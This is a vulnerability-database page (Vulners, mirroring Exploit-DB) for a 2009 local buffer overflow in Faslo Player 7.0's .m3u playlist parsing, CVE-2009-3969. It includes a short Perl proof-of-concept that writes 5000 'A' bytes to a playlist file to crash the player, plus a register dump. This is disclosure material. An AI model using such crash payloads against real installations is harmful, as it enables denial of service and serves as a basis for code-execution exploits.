Lucene search
+L

Faslo Player 7.0 - '.m3u' Local Buffer Overflow (PoC)

🗓️ 24 Aug 2009 00:00:00Reported by hack4loveType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

Faslo Player 7.0 '.m3u' Local Buffer Overflo

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-3969
24 Aug 200900:00
circl
cve
CVE
CVE-2009-3969
18 Nov 200923:00
cve
cvelist
Cvelist
CVE-2009-3969
18 Nov 200923:00
cvelist
euvd
EUVD
EUVD-2009-3940
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-3969
18 Nov 200923:30
nvd
openvas
OpenVAS
Fasloi Player .m3u Playlist Processing Buffer Overflow Vulnerability
23 Nov 200900:00
openvas
openvas
OpenVAS
Fasloi Player .m3u Playlist Processing Buffer Overflow Vulnerability
23 Nov 200900:00
openvas
prion
Prion
Stack overflow
18 Nov 200923:30
prion
#!/usr/bin/perl
# Found By :: HACK4LOVE
# [email protected]
# Faslo Player 7.0 (.m3u) Local Buffer Overflow PoC
# http://www.rspq.org/faslo/fs7setup.exe
############################################################
##EAX 41414141
##ECX 004A7CB0 faslow.004A7CB0
##EDX 00145920
##EBX 00000000
##ESP 0012F5B0
##EBP 0012FC84
##ESI 003F9BC9
##EDI 003F9BC9
##EIP 73DD526E MFC42.73DD526E
#############################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.m3u');
print myfile $crash;
##############################################################

# milw0rm.com [2009-08-24]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Sep 2010 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.06229
32